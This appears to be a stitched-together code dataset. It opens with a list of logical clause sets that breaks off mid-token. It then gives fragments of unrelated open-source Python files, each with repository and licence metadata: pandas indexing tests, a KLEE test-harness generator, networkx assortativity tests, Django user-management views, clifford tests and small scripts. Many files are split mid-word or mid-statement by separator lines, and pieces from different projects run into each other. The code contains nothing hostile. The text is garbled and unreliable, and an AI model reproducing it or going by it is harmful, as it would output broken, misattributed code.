{p25, p20, p1, not_p5, not_p8, p15, not_p4, p16, not_p3}
{not_p5, p12, not_p8, p15, not_p4, p16, not_p3}
{p2, p25, not_p5, not_p8, p15, not_p4, p16, not_p25}
{p25, p18, p1, not_p5, not_p8, p15, not_p4, p16, not_p25}
{p25, p20, p1, not_p5, not_p8, p15, not_p4, p16, not_p25}
{not_p5, p12, not_p8, p15, not_p4, p16, not_p25}
{p25, p18, p1, not_p5, not_p8, p15, not_p4, p21, p14, p16}
{p25, p20, p1, not_p5, not_p8, p15, not_p4, p21, p14, p16}
{p2, p25, not_p5, not_p8, p15, not_p4, p21, p14, p16}
{p25, not_p20, p18, p1, not_p5, not_p8, p15, not_p4, p14, p16}
{p25, not_p20, p20, p1, not_p5, not_p8, p15, not_p4, p14, p16}
{p2, p25, not_p20, not_p5, not_p8, p15, not_p4, p14, p16}
{p25, p18, p1, not_p5, not_p8, p15, p9, not_p4, p16}
{p25, p20, p1, not_p5, not_p8, p15, p9, not_p4, p16, p6}
{p7, p25, p20, p1, not_p5, not_p8, p15, p9, not_p4, p16}
{p2, p25, not_p5, not_p8, p15, p9, not_p4, p16}
{p8, p7, p20, p1, not_p5, not_p8, p15, p9, not_p4, p16}
{not_p5, p12, not_p8, p15, not_p4, p14, p16}
{not_p5, p12, not_p8, p15, p9, not_p4, p16}
{p8, p18, p1, not_p5, p15, p9, not_p4, p16, p6}
{p8, p18, p1, not_p5, p15, not_p4, p16, p6, not_p3}
{p8, p18, p1, not_p5, p15, not_p4, p16, p6, not_p25}
{p8, p18, p1, not_p5, p15, not_p4, p21, p14, p16, p6}
{p8, not_p20, p18, p1, not_p5, p15, not_p4, p14, p16, p6}
{p8, p20, p1, not_p5, p15, p9, not_p4, p16, p6}
{p8, p20, p1, not_p5, p15, not_p4, p16, p6, not_p3}
{p8, p20, p1, not_p5, p15, not_p4, p16, p6, not_p25}
{p8, p20, p1, not_p5, p15, not_p4, p21, p14, p16, p6}
{p8, not_p20, p20, p1, not_p5, p15, not_p4, p14, p16, p6}
{p8, p7, p20, p1, not_p5, not_p19, p15, p9, not_p4, p16}
{not_p5, not_p19, p12, p15, not_p4, p16, not_p3}
{not_p5, p12, p15, not_p4, p16, p6, not_p3}
{not_p5, p12, p15, not_p4, p14, p16, p6}
{not_p5, p12, p15, not_p4, p16, p6, not_p25}
{not_p5, p12, p15, p9, not_p4, p16, p6}
{not_p5, not_p19, p12, p15, not_p4, p14, p16}
{not_p5, not_p19, p12, p15, not_p4, p16, not_p25}
{not_p5, not_p19, p12, p15, p9, not_p4, p16}
{p22, p12, p17, p15, not_p4, p5, p16, not_p3}
{p1, p22, p17, p15, not_p4, p5, p16, not_p3}
{p2, p22, p17, p15, not_p4, p5, p16, not_p3}
{p22, p12, p17, p15, not_p4, p5, p16, not_p25}
{p1, p22, p17, p15, not_p4, p5, p16, not_p25}
{p2, p22, p17, p15, not_p4, p5, p16, not_p25}
{p22, p12, p17, p15, not_p4, p5, p14, p16}
{p1, p22, p17, p15, not_p4, p5, p14, p16}
{p2, p22, p17, p15, not_p4, p5, p14, p16}
{p22, p12, p17, p15, p9, not_p4, p5, p16}
{p1, p22, p17, p15, p9, not_p4, p5, p16, p6}
{p18, p1, p22, p17, p15, p9, not_p4, p5, p16}
{p7, p1, p22, p17, p15, p9, not_p4, p5, p16}
{p2, p22, p17, p15, p9, not_p4, p5, p16}
{p18, p1, not_p19, p17, p15, not_p4, p5, p21, p16, not_p3}
{p20, p1, not_p19, p17, p15, not_p4, p5, p21, p16, not_p3}
{p2, not_p19, p17, p15, not_p4, p5, p21, p16, not_p3}
{not_p5, p12, p17, p15, not_p4, p5, p21, p16, not_p3}
{p18, p1, not_p5, p17, p15, not_p4, p5, p21, p16, not_p3}
{p20, p1, not_p5, p17, p15, not_p4, p5, p21, p16, not_p3}
{p2, not_p5, p17, p15, not_p4, p5, p21, p16, not_p3}
{p25, p18, p1, not_p19, p17, p15, not_p4, p5, p16, not_p3}
{p25, p20, p1, not_p19, p17, p15, not_p4, p5, p16, not_p3}
{p2, p25, not_p19, p17, p15, not_p4, p5, p16, not_p3}
{p25, p18, p1, not_p5, p17, p15, not_p4, p5, p16, not_p3}
{p25, p20, p1, not_p5, p17, p15, not_p4, p5, p16, not_p3}
{p2, p25, not_p5, p17, p15, not_p4, p5, p16, not_p3}
{p18, p1, not_p19, p17, p15, not_p4, p5, p21, p16, not_p25}
{p20, p1, not_p19, p17, p15, not_p4, p5, p21, p16, not_p25}
{p2, not_p19, p17, p15, not_p4, p5, p21, p16, not_p25}
{not_p5, p12, p17, p15, not_p4, p5, p21, p16, not_p25}
{p18, p1, not_p5, p17, p15, not_p4, p5, p21, p16, not_p25}
{p20, p1, not_p5, p17, p15, not_p4, p5, p21, p16, not_p25}
{p2, not_p5, p17, p15, not_p4, p5, p21, p16, not_p25}
{p25, p18, p1, not_p19, p17, p15, not_p4, p5, p16, not_p25}
{p25, p20, p1, not_p19, p17, p15, not_p4, p5, p16, not_p25}
{p2, p25, not_p19, p17, p15, not_p4, p5, p16, not_p25}
{p25, p18, p1, not_p5, p17, p15, not_p4, p5, p16, not_p25}
{p25, p20, p1, not_p5, p17, p15, not_p4, p5, p16, not_p25}
{p2, p25, not_p5, p17, p15, not_p4, p5, p16, not_p25}
{p18, p1, not_p19, p17, p15, not_p4, p5, p21, p14, p16}
{p20, p1, not_p19, p17, p15, not_p4, p5, p21, p14, p16}
{p2, not_p19, p17, p15, not_p4, p5, p21, p14, p16}
{not_p5, p12, p17, p15, not_p4, p5, p21, p14, p16}
{p18, p1, not_p5, p17, p15, not_p4, p5, p21, p14, p16}
{p20, p1, not_p5, p17, p15, not_p4, p5, p21, p14, p16}
{p2, not_p5, p17, p15, not_p4, p5, p21, p14, p16}
{p25, p18, p1, not_p19, p17, p15, not_p4, p5, p14, p16}
{p25, p20, p1, not_p19, p17, p15, not_p4, p5, p14, p16}
{p2, p25, not_p19, p17, p15, not_p4, p5, p14, p16}
{p25, p18, p1, not_p5, p17, p15, not_p4, p5, p14, p16}
{p25, p20, p1, not_p5, p17, p15, not_p4, p5, p14, p1
|
rs2/pandas
|
pandas/tests/indexing/test_iloc.py
|
Python
|
bsd-3-clause
| 46,354
| 0.001079
|
""" test positional based indexing with iloc """
from datetime import datetime
import re
from warnings import (
catch_warnings,
simplefilter,
)
import numpy as np
import pytest
import pandas.util._test_decorators as td
from pandas import (
NA,
Categorical,
CategoricalDtype,
DataFrame,
Index,
Interval,
NaT,
Series,
array,
concat,
date_range,
isna,
)
import pandas._testing as tm
from pandas.api.types import is_scalar
from pandas.core.indexing import IndexingError
from pandas.tests.indexing.common import Base
# We pass through the error message from numpy
_slice_iloc_msg = re.escape(
"only integers, slices (`:`), ellipsis (`...`), numpy.newaxis (`None`) "
"and integer or boolean arrays are valid indices"
)
class TestiLoc(Base):
@pytest.mark.parametrize("key", [2, -1, [0, 1, 2]])
def test_iloc_getitem_int_and_list_int(self, key):
self.check_result(
"iloc",
key,
typs=["labels", "mixed", "ts", "floats", "empty"],
fails=IndexError,
)
# array of ints (GH5006), make sure that a single indexer is returning
# the correct type
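    # Illustrative sketch (not in the original file): a list indexer preserves the
    # container type, while a scalar indexer drops down to a scalar value.
    def test_iloc_getitem_int_vs_list_int_type(self):
        ser = Series([10, 20, 30])
        assert is_scalar(ser.iloc[2])
        tm.assert_series_equal(ser.iloc[[2]], Series([30], index=[2]))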
class TestiLocBaseIndependent:
"""Tests Independent Of Base Class"""
@pytest.mark.parametrize(
"key",
[
slice(None),
slice(3),
range(3),
[0, 1, 2],
Index(range(3)),
np.asarray([0, 1, 2]),
],
)
@pytest.mark.parametrize("indexer", [tm.loc, tm.iloc])
def test_iloc_setitem_fullcol_categorical(self, indexer, key, using_array_manager):
frame = DataFrame({0: range(3)}, dtype=object)
cat = Categorical(["alpha", "beta", "gamma"])
if not using_array_manager:
assert frame._mgr.blocks[0]._can_hold_element(cat)
df = frame.copy()
orig_vals = df.values
indexer(df)[key, 0] = cat
overwrite = isinstance(key, slice) and key == slice(None)
if overwrite or using_array_manager:
# TODO(ArrayManager) we always overwrite because ArrayManager takes
# the "split" path, which still overwrites
# TODO: GH#39986 this probably shouldn't behave differently
expected = DataFrame({0: cat})
assert not np.shares_memory(df.values, orig_vals)
else:
expected = DataFrame({0: cat}).astype(object)
if not using_array_manager:
assert np.shares_memory(df[0].values, orig_vals)
tm.assert_frame_equal(df, expected)
# check we dont have a view on cat (may be undesired GH#39986)
df.iloc[0, 0] = "gamma"
        # both the overwrite and non-overwrite paths leave the original Categorical untouched
        assert cat[0] != "gamma"
# TODO with mixed dataframe ("split" path), we always overwrite the column
frame = DataFrame({0: np.array([0, 1, 2], dtype=object), 1: range(3)})
df = frame.copy()
orig_vals = df.values
indexer(df)[key, 0] = cat
expected = DataFrame({0: cat, 1: range(3)})
tm.assert_frame_equal(df, expected)
# TODO(ArrayManager) does not yet update parent
@td.skip_array_manager_not_yet_implemented
@pytest.mark.parametrize("box", [array, Series])
def test_iloc_setitem_ea_inplace(self, frame_or_series, box, using_array_manager):
# GH#38952 Case with not setting a full column
# IntegerArray without NAs
arr = array([1, 2, 3, 4])
obj = frame_or_series(arr.to_numpy("i8"))
if frame_or_series is Series or not using_array_manager:
values = obj.values
else:
values = obj[0].values
if frame_or_series is Series:
obj.iloc[:2] = box(arr[2:])
else:
obj.iloc[:2, 0] = box(arr[2:])
expected = frame_or_series(np.array([3, 4, 3, 4], dtype="i8"))
tm.assert_equal(obj, expected)
# Check that we are actually in-place
if frame_or_series is Series:
assert obj.values is values
else:
if using_array_manager:
assert obj[0].values is values
else:
assert obj.values.base is values.base and values.base is not None
def test_is_scalar_access(self):
# GH#32085 index with duplicates doesn't matter for _is_scalar_access
index = Index([1, 2, 1])
ser = Series(range(3), index=index)
assert ser.iloc._is_scalar_access((1,))
df = ser.to_frame()
assert df.iloc._is_scalar_access((1, 0))
def test_iloc_exceeds_bounds(self):
# GH6296
# iloc should allow indexers that exceed the bounds
df = DataFrame(np.random.random_sample((20, 5)), columns=list("ABCDE"))
# lists of positions should raise IndexError!
msg = "positional indexers are out-of-bounds"
with pytest.raises(IndexError, match=msg):
df.iloc[:, [0, 1, 2, 3, 4, 5]]
with pytest.raises(IndexError, match=msg):
df.iloc[[1, 30]]
with pytest.raises(IndexError, match=msg):
df.iloc[[1, -30]]
with pytest.raises(IndexError, match=msg):
df.iloc[[100]]
s = df["A"]
with pytest.raises(IndexError, match=msg):
s.iloc[[100]]
with pytest.raises(IndexError, match=msg):
s.iloc[[-100]]
# still raise on a single indexer
msg = "single positional indexer is out-of-bounds"
with pytest.raises(IndexError, match=msg):
df.iloc[30]
with pytest.raises(IndexError, match=msg):
df.iloc[-30]
# GH10779
# single positive/negative indexer exceeding Series bounds should raise
# an IndexError
with pytest.raises(IndexError, match=msg):
s.iloc[30]
with pytest.raises(IndexError, match=msg):
s.iloc[-30]
# slices are ok
result = df.iloc[:, 4:10] # 0 < start < len < stop
expected = df.iloc[:, 4:]
tm.assert_frame_equal(result, expected)
result = df.iloc[:, -4:-10] # stop < 0 < start < len
expected = df.iloc[:, :0]
tm.assert_frame_equal(result, expected)
result = df.iloc[:, 10:4:-1] # 0 < stop < len < start (down)
expected = df.iloc[:, :4:-1]
tm.assert_frame_equal(result, expected)
result = df.iloc[:, 4:-10:-1] # stop < 0 < start < len (down)
expected = df.iloc[:, 4::-1]
tm.assert_frame_equal(result, expected)
result = df.iloc[:, -10:4] # start < 0 < stop < len
expected = df.iloc[:, :4]
tm.assert_frame_equal(result, expected)
result = df.iloc[:, 10:4] # 0 < stop < len < start
expected = df.iloc[:, :0]
tm.assert_frame_equal(result, expected)
result = df.iloc[:, -10:-11:-1] # stop < start < 0 < len (do
|
wn)
|
expected = df.iloc[:, :0]
tm.assert_frame_equal(result, expected)
result = df.iloc[:, 10:11] # 0 < len < start < stop
expected = df.iloc[:, :0]
tm.assert_frame_equal(result, expected)
# slice bounds exceeding is ok
result = s.iloc[18:30]
expected = s.iloc[18:]
tm.assert_series_equal(result, expected)
result = s.iloc[30:]
expected = s.iloc[:0]
tm.assert_series_equal(result, expected)
result = s.iloc[30::-1]
expected = s.iloc[::-1]
tm.assert_series_equal(result, expected)
# doc example
def check(result, expected):
str(result)
result.dtypes
tm.assert_frame_equal(result, expected)
dfl = DataFrame(np.random.randn(5, 2), columns=list("AB"))
check(dfl.iloc[:, 2:3], DataFrame(index=dfl.index))
check(dfl.iloc[:, 1:3], dfl.iloc[:, [1]])
check(dfl.iloc[4:6], dfl.iloc[[4]])
msg = "positional indexers are out-of-bounds"
with pytest.raises(IndexError, match=msg):
dfl.iloc[[4, 5, 6]]
msg = "single positional indexer is out-of-bounds"
with pytest.raises(IndexError, match=msg):
dfl
|
ranok/sledgehammer
|
klee-unit/klee-unit.py
|
Python
|
mit
| 4,806
| 0.007491
|
#!/usr/bin/env python
#########################################################################################
# KLEE-Unit
# Author: Jacob Torrey
# Date: 3/15/2016
#
# Script to auto-generate test harness and execute symbolically with KLEE for a passed C
# file
#########################################################################################
import sys
import os
import shutil
import re
import subprocess
from glob import glob
from pycparser import c_parser, c_ast
from ctags import CTags, TagEntry
def collect_klee_runs():
'''Navigates all KLEE output directories and performs basic triage'''
errs = glob('klee-out-*/*.err')
col = {'ptr': 0, 'free': 0, 'div': 0, 'abort': 0, 'assert': 0, 'user': 0, 'model': 0, 'exec': 0}
for e in errs:
e = re.sub(r'\.err', '', e)
e = re.sub(r'^.*test.*[0-9]\.', '', e)
col[e] += 1
print "Found " + str(len(errs)) + " errors in file"
print str(col)
def run_klee(filename, maxs = 180):
'''Runs KLEE on a given file'''
return subprocess.call(['klee', '--libc=uclibc', '--posix-runtime', '-max-time=' + str(maxs), filename])
def generate_c(filename, func):
'''Generates a test harness and temp C file for a passed function'''
    # Copy the source to a duplicate file that is safe to modify and discard
newfn = filename[:-2] + "_" + func[0] + '.c'
shutil.copyfile(filename, newfn)
# Rename main() to something not conflicting
f = open(newfn, 'r')
c = f.read()
f.close()
c = re.sub(r' main\s?\(', ' not_main(', c)
c = c + "\r\n\r\n"
# Generate our own main() using symbolic variables for every function argument
main = "int main(int argc, char **argv) {\r\n"
i = 0
fc = func[0] + "("
for f in func[1][1]:
vn = 'var' + str(i)
fc += vn + ", "
vl = f + " " + vn + ";\r\n"
vl += "klee_make_symbolic(&" + vn + ", sizeof(" + f + "), \"" + vn + "\");\r\n"
i += 1
main += vl
    # strip the trailing ", " only when the function actually takes arguments
    if func[1][1]:
        fc = fc[:-2] + ");\r\n"
    else:
        fc = fc + ");\r\n"
main += fc
main += "return 0;\r\n}\r\n"
c += main
# Inject into temp file
f = open(newfn, 'w')
f.write(c)
f.close()
# Return temp file name
return newfn
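# Illustrative sketch (not part of the original script): for a tags entry such as
# ('add', ['int', ['int', 'int']]) the main() appended by generate_c() comes out
# roughly as:
#   int main(int argc, char **argv) {
#   int var0;
#   klee_make_symbolic(&var0, sizeof(int), "var0");
#   int var1;
#   klee_make_symbolic(&var1, sizeof(int), "var1");
#   add(var0, var1);
#   return 0;
#   }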
def compile_c(filename, outname = 'kleeunit.bc'):
'''Compiles for execution with KLEE'''
ret = subprocess.call(['clang', '-g', '-emit-llvm', '-c', filename, '-o', outname])
#os.remove(filename)
return ret
def run_ctags(filename):
'''Executes the ctags command on the passed filename to generate the tags file'''
return subprocess.call(['ctags', filename])
def parse_pattern(pattern):
'''Parses a ctags pattern string'''
pattern = pattern[2:-2] + ";"
parser = c_parser.CParser()
try:
node = parser.parse(pattern, filename = '<stdin>')
except c_parser.ParseError:
|
print "Unable to parse pattern: " + pattern
sys.exit(-1)
return (node.ext[-1].name, _explain_type(node.ext[-1]))
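# Illustrative sketch (not part of the original script): for a ctags pattern such as
#   /^int add(int a, int b)$/
# parse_pattern() returns ('add', ['int', ['int', 'int']]).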
def _explain_type(decl):
'''Recursively explains a type decl node'''
typ = type(decl)
if typ == c_ast.TypeDecl:
quals = ' '.join(decl.quals) + ' ' if decl.quals else ''
return quals + _explain_type(decl.type)
elif typ == c_ast.Typename or typ == c_ast.Decl:
return _explain_t
|
ype(decl.type)
elif typ == c_ast.IdentifierType:
return ' '.join(decl.names)
elif typ == c_ast.PtrDecl:
quals = ' '.join(decl.quals) + ' ' if decl.quals else ''
return quals + _explain_type(decl.type) + "*"
elif typ == c_ast.ArrayDecl:
arr = 'array'
if decl.dim: arr += '[%s]' % decl.dim.value
return arr + " of " + _explain_type(decl.type)
elif typ == c_ast.FuncDecl:
if decl.args:
params = [_explain_type(param) for param in decl.args.params]
else:
params = []
return [_explain_type(decl.type), params]
def parse_ctags():
'''Returns a list of all the functions and their arguments found by ctags'''
try:
tf = CTags('tags')
except:
print "Unable to find tags file!"
sys.exit(-1)
entry = TagEntry()
l = []
if 0 == tf.first(entry):
return []
while True:
l.append(parse_pattern(entry['pattern']))
if 0 == tf.next(entry):
break
return l
def controller():
'''Main handler that dispatches calls for KLEE-unit'''
if len(sys.argv) != 2:
print "KLEE-Unit: Usage: " + sys.argv[0] + " file_to_analyze.c"
sys.exit(-1)
filename = sys.argv[1]
run_ctags(filename)
funcs = parse_ctags()
for f in funcs:
if f[0] == 'main':
continue
fn = generate_c(filename, f)
compile_c(fn, fn + '.bc')
run_klee(fn + '.bc')
collect_klee_runs()
if __name__ == "__main__":
controller()
|
lluxury/pcc_exercise
|
07/pastrami.py
|
Python
|
mit
| 265
| 0.030189
|
sandwich_orders = ['Bacon
|
','Bacon, egg and cheese','Bagel toast','pastrami','pastrami','pastrami']
print ('pastrami sandwich was sold out')
finished_sandwiches = []
while 'pastrami' in sandwich_orders:
sandwich_orders.remove('pastrami')
print(sandwich_o
|
rders)
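# Illustrative completion (not in the original snippet): the companion deli exercise
# usually also moves the remaining orders into finished_sandwiches.
for sandwich in sandwich_orders:
    finished_sandwiches.append(sandwich)
    print("I made your " + sandwich + " sandwich.")
print(finished_sandwiches)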
|
JMoravec/unkRadnet
|
zunzunCode/pythonequations/Examples/SimpleExamples/NonLinearFit2D.py
|
Python
|
bsd-3-clause
| 1,888
| 0.009534
|
#! /usr/bin/python
# Version info: $Id: NonLinearFit2D.p
|
y 230 2010-06-30 20:20:14Z zunzun.com $
# the pythonequations base is located up one directory from the top-level examples
# directory, go up one directory in the path from there for the import to work properly
import sys, os
if os.path.join(sys.path[0][:sys.p
|
ath[0].rfind(os.sep)], '../..') not in sys.path:
sys.path.append(os.path.join(sys.path[0][:sys.path[0].rfind(os.sep)], '../..'))
import pythonequations
equation = pythonequations.Equations2D.Exponential.Exponential2D() # Simple non-linear function
equation.fittingTarget = 'SSQABS' # see the Equation base class for a list of fitting targets
equation.ConvertTextToData(equation.exampleData) # Equations have ASCII text data for testing and examples
equation.Initialize() # now that the equation has data, set up the cache
# If performing a nonlinear fit and you have parameter estimates, set them
# instead of calling this method. This call is harmless for linear fits
equation.SetGAParametersAndGuessInitialCoefficientsIfNeeded() # estimate initial parameters if needed
equation.FitToCacheData() # perform the fit
equation.CalculateErrors() # so we can print the errors
print equation.name, str(equation.dimensionality) + "D"
print equation.fittingTarget + ":", equation.CalculateFittingTarget(equation.coefficientArray)
for i in range(len(equation.coefficientArray)):
print "Coefficient " + equation.coefficientDesignatorTuple[i] + ": " + str(equation.coefficientArray[i])
print
for i in range(len(equation.DependentDataArray)):
print 'X:', equation.IndependentDataArray[0][i],
print 'Y', equation.DependentDataArray[i],
print 'Model:', equation.PredictedArray[i],
print 'Abs. Error:', equation.AbsoluteErrorArray[i],
print 'Rel. Error:', equation.RelativeErrorArray[i],
print 'Percent Error:', equation.PercentErrorArray[i]
|
ankanch/tieba-zhuaqu
|
user-application/KCrawlerControal/Debug/plugins/trash/singleword.py
|
Python
|
gpl-3.0
| 978
| 0.032663
|
import lib.result_functions_file as RFF
import lib.maglib as MSG
import os
#
|
This module counts the number of occurrences of each word and displays the result
# This is a basic client-side plugin of the tieba-zhuaqu project
def satisticWord(word,datalist):
os.system('cls')
    print('>>>>> Start counting occurrences of [', word, '] ..
|
..')
sum=1
mlist=[]
for item in datalist:
if item.find(word) != -1:
sum+=1
mlist.append(item)
print('>',end='')
    print('>>>>> Counting finished!\n\n')
MSG.printline2x35(2)
    print('\r\n>>>>> Result >-----> [', sum-1, '/', len(datalist), '] matching entries, listed below', '\r\n')
MSG.printline2x35(2)
for item in mlist:
print('\t◆\t',item)
MSG.printline2x35(2)
    print('\r\n>>>>> Result >-----> [', sum-1, '/', len(datalist), '] matching entries, listed below', '\r\n')
MSG.printline2x35(2)
return 'SW',sum-1
satisticWord(input("Enter the word to count: "), RFF.getContentList())
|
SpaceGroupUCL/qgisSpaceSyntaxToolkit
|
esstoolkit/external/networkx/algorithms/assortativity/tests/test_mixing.py
|
Python
|
gpl-3.0
| 5,415
| 0.000923
|
import pytest
np = pytest.importorskip("numpy")
npt = pytest.importorskip("numpy.testing")
import networkx as nx
from .base_test import BaseTestAttributeMixing, BaseTestDegreeMixing
class TestDegreeMixingDict(BaseTestDegreeMixing):
def test_degree_mixing_dict_undirected(self):
d = nx.degree_mixing_dict(self.P4)
d_result = {
1: {2: 2},
2: {1: 2, 2: 2},
}
assert d == d_result
def test_degree_mixing_dict_undirected_normalized(self):
d = nx.degree_mixing_dict(self.P4, normalized=True)
d_result = {
1: {2: 1.0 / 3},
2: {1: 1.0 / 3, 2: 1.0 / 3},
}
assert d == d_result
def test_degree_mixing_dict_directed(self):
d = nx.degree_mixing_dict(self.D)
print(d)
d_result = {1: {3: 2}, 2: {1: 1, 3: 1}, 3: {}}
assert d == d_result
def test_degree_mixing_dict_multigraph(self):
d = nx.degree_mixing_dict(self.M)
d_result = {1: {2: 1}, 2: {1: 1, 3: 3}, 3: {2: 3}}
assert d == d_result
class TestDegreeMixingMatrix(BaseTestDegreeMixing):
def test_degree_mixing_matrix_undirected(self):
# fmt: off
a_result = np.array([[0, 0, 0],
[0, 0, 2],
[0, 2, 2]]
)
# fmt: on
a = nx.degree_mixing_matrix(self.P4, normalized=False)
npt.assert_equal(a, a_result)
a = nx.degree_mixing_matrix(self.P4)
npt.assert_equal(a, a_result / float(a_result.sum()))
def test_degree_mixing_matrix_directed(self):
# fmt: off
a_result = np.array([[0, 0, 0, 0],
[0, 0, 0, 2],
[0, 1, 0, 1],
[0, 0, 0, 0]]
)
# fmt: on
a = nx.degree_mixing_matrix(self.D, normalized=False)
npt.assert_equal(a, a_result)
a = nx.degree_mixing_matrix(self.D)
npt.assert_equal(a, a_result / float(a_result.sum()))
def test_degree_mixing_matrix_multigraph(self):
# fmt: off
a_result = np.array([[0, 0, 0, 0],
[0, 0, 1, 0],
[0, 1, 0, 3],
[0, 0, 3, 0]]
)
# fmt: on
a = nx.degree_mixing_matrix(self.M, normalized=False)
npt.assert_equal(a, a_result)
a = nx.degree_mixing_matrix(self.M)
npt.assert_equal(a, a_result / float(a_result.sum()))
def test_degree_mixing_matrix_selfloop(self):
# fmt: off
a_result = np.array([[0, 0, 0],
[0, 0, 0],
[0, 0, 2]]
)
# fmt: on
a = nx.degree_mixing_matrix(self.S, normalized=False)
npt.assert_equal(a, a_result)
a = nx.degree_mixing_matrix(self.S)
npt.assert_equal(a, a_result / float(a_result.sum()))
class TestAttributeMixingDict(BaseTestAttributeMixing):
def test_attribute_mixing_dict_undirected(self):
d = nx.attribute_mixing_dict(self.G, "fish")
d_result = {
"one": {"one": 2, "red": 1},
"two": {"two": 2, "blue": 1},
"red": {"one": 1},
"blue": {"two": 1},
}
assert d == d_result
def test_attribute_mixing_dict_directed(self):
d = nx.attribute_mixing_dict(self.D, "fish")
d_result = {
"one": {"one": 1, "red": 1},
"two": {"two": 1, "blue": 1},
"red": {},
"blue": {},
}
assert d == d_result
def test_attribute_mixing_dict_multigraph(self):
d = nx.attribute_mixing_dict(self.M, "fish")
d_result = {
"one": {"one": 4},
"two": {"two": 2},
}
assert d == d_result
class TestAttributeMixingMatrix(BaseTestAttributeMixing):
def test_attribute_mixing_matrix_undirected(self):
mapping = {"one": 0, "two": 1, "red": 2, "blue": 3}
a_result = np.array([[2, 0, 1, 0], [0, 2, 0, 1], [1, 0, 0, 0], [0, 1, 0, 0]])
a = nx.attribute_mixing_matrix(
self.G, "fish", mapping=mapping, normalized=False
)
npt.assert_equal(a, a_result)
a = nx.attribute_mixing_matrix(self.G, "fish", mapping=mapping)
npt.assert_equal(a, a_result / float(a_result.sum()))
def test_attribute_mixing_matrix_directed(self):
mapping = {"one": 0, "two": 1, "red": 2, "blue": 3}
a_result = np.array([[1, 0, 1, 0], [0, 1, 0, 1], [0, 0, 0, 0], [0, 0, 0, 0]])
a = nx.attribute_mixing_matrix(
self.D, "fish", mapping=mapping, normalized=False
)
npt.assert_equal(a, a_result)
a = nx.attribute_mixing_matrix(self.D, "fish", mapping=mapping)
npt.assert_equal(a, a_result / float(a_result.sum()))
def test_attribute_mixing_matrix_multigraph(self):
mapping = {"one": 0, "tw
|
o": 1, "red": 2, "blue": 3}
a_result = np.array([[4, 0, 0, 0], [0, 2, 0, 0], [0, 0, 0, 0], [0, 0, 0, 0]])
a = nx.attribute_mixing_matrix(
self.M, "fish", mapping=mapping, normalized=False
)
npt.assert_equal(a, a_result)
|
a = nx.attribute_mixing_matrix(self.M, "fish", mapping=mapping)
npt.assert_equal(a, a_result / float(a_result.sum()))
|
zofuthan/airmozilla
|
airmozilla/manage/views/users.py
|
Python
|
bsd-3-clause
| 3,960
| 0
|
import collections
from django.conf import settings
from django.contrib.auth.models import User, Group
from django.core.cache import cache
from django.contrib import messages
from django.shortcuts import render, redirect
from django.db import transaction
from django.db.models import Q
from funfactory.urlresolvers import reverse
from jsonview.decorators import json_view
from airmozilla.base.utils import dot_dict
from airmozilla.main.models import UserProfile
from airmozilla.manage import forms
from .decorators import (
staff_required,
permission_required,
cancel_redirect
)
@staff_required
@permission_required('auth.change_user')
def users(request):
"""User editor: view users and update a user's group."""
_mozilla_email_filter = (
Q(email__endswith='@%s' % settings.ALLOWED_BID[0])
)
for other in settings.ALLOWED_BID[1:]:
_mozilla_email_filter |= (
Q(email__endswith='@%s' % other)
)
users_stats = {
'total': User.objects.all().count(),
'total_mozilla_email': (
User.objects.filter(_mozilla_email_filter).count()
),
}
context = {
'users_stats': users_stats,
}
return render(request, 'manage/users.html', context)
@staff_required
@permission_required('auth.change_user')
@json_view
def users_data(request):
context = {}
users = cache.get('_get_all_users')
if users is None:
users = _get_all_users()
# this is invalidated in models.py
cache.set('_get_all_users', users, 60 * 60)
context['users'] = users
context['urls'] = {
'manage:user_edit': reverse('manage:user_edit', args=('0',))
}
return context
def _get_all_users():
groups = {}
for group in Group.objects.all().values('id', 'name'):
groups[group['id']] = group['name']
groups_map = collections.defaultdict(list)
for x in User.groups.through.objects.all().values('user_id', 'group_id'):
groups_map[x['user_id']].append(groups[x['group_id']])
users = []
qs = User.objects.all()
values = (
'email',
'id',
'last_login',
'is_staff',
'is_active',
'is_superuser'
)
# make a big fat list of the user IDs of people who are contributors
contributor_ids = (
UserProfile.objects
.filter(contributor=True)
.values_list('user_id', flat=True)
)
for user_dict in qs.values(*values):
user = dot_dict(user_dict)
item = {
'id': user.id,
'email': user.email,
'last_login': user.last_login.isoformat(),
}
# The reason we only add these if they're true is because we want
# to minimize the amount of JSON we return. It works because in
# javascript, doing `if (thing.something)` works equally if it
# exists and is false or if it does not exist.
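        # Illustrative sketch (not in the original view): an ordinary active user
        # with no groups therefore serializes to just
        #   {"id": 1, "email": "user@example.com", "last_login": "2016-01-01T00:00:00"}
        # and carries none of the boolean flags.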
if user.is_staff:
item['is_staff'] = True
if user.is_superuser:
item['is_superuser'] = True
if user.id in contributor_ids:
item['is_contributor'] = True
if not user.is_active:
item['is_inactive'] = True
if groups_map[user.id]:
item['groups'] = groups_map[user.id]
users.append(item)
return users
@staff_required
@permission_required('auth.change_user')
@cancel_redirect('manage:users')
@transaction.atomic
def user_edit(request, id):
"""Editing an individual user."""
user = User.objects.get(id=id)
if request.method ==
|
'POST':
form = forms.UserEditForm(request.POST, instance=user)
if form.is_valid():
form.save()
messages.info(request, 'User %s saved.' % user.email)
|
return redirect('manage:users')
else:
form = forms.UserEditForm(instance=user)
return render(request, 'manage/user_edit.html',
{'form': form, 'user': user})
|
arsenovic/clifford
|
clifford/test/test_tools.py
|
Python
|
bsd-3-clause
| 8,422
| 0.0019
|
import pytest
import numpy as np
from numpy import testing
from clifford import Cl
from clifford.tools import orthoFrames2Versor as of2v
from clifford._numba_utils import DISABLE_JIT
from clifford import tools
from . import rng # noqa: F401
too_slow_without_jit = pytest.mark.skipif(
DISABLE_JIT, reason="test is too slow without JIT"
)
class TestTools:
def checkit(self, p, q, rng): # noqa: F811
# p, q =4,0
N = p + q
# eps(1e-4)
layout, blades = Cl(p, q)
# create frame
A = layout.randomV(n=N, rng=rng)
# create Rotor
R = 5.*layout.randomRotor(rng=rng)
# create rotated frame
B = [R*a*~R for a in A]
# find versor from both frames
R_found, rs = of2v(A, B)
        # Rotor is determined correctly, within a sign
        assert R == R_found or R == -R_found
        # Determined Versor implements desired transformation
        assert [R_found*a*~R_found for a in A] == B
    @pytest.mark.skip(reason="unknown")
    def testOrthoFrames2VersorEuclidean(self, rng):  # noqa: F811
        for p, q in [(2, 0), (3, 0), (4, 0)]:
            self.checkit(p=p, q=q, rng=rng)
@pytest.mark.skip(reason="unknown") # fails
    def testOrthoFrames2VersorMinkowski(self, rng):  # noqa: F811
        for p, q in [(1, 1), (2, 1), (3, 1)]:
            self.checkit(p=p, q=q, rng=rng)
@pytest.mark.skip(reason="unknown") # fails
    def testOrthoFrames2VersorBalanced(self, rng):  # noqa: F811
        for p, q in [(2, 2)]:
            self.checkit(p=p, q=q, rng=rng)
def testframe2Mat(self):
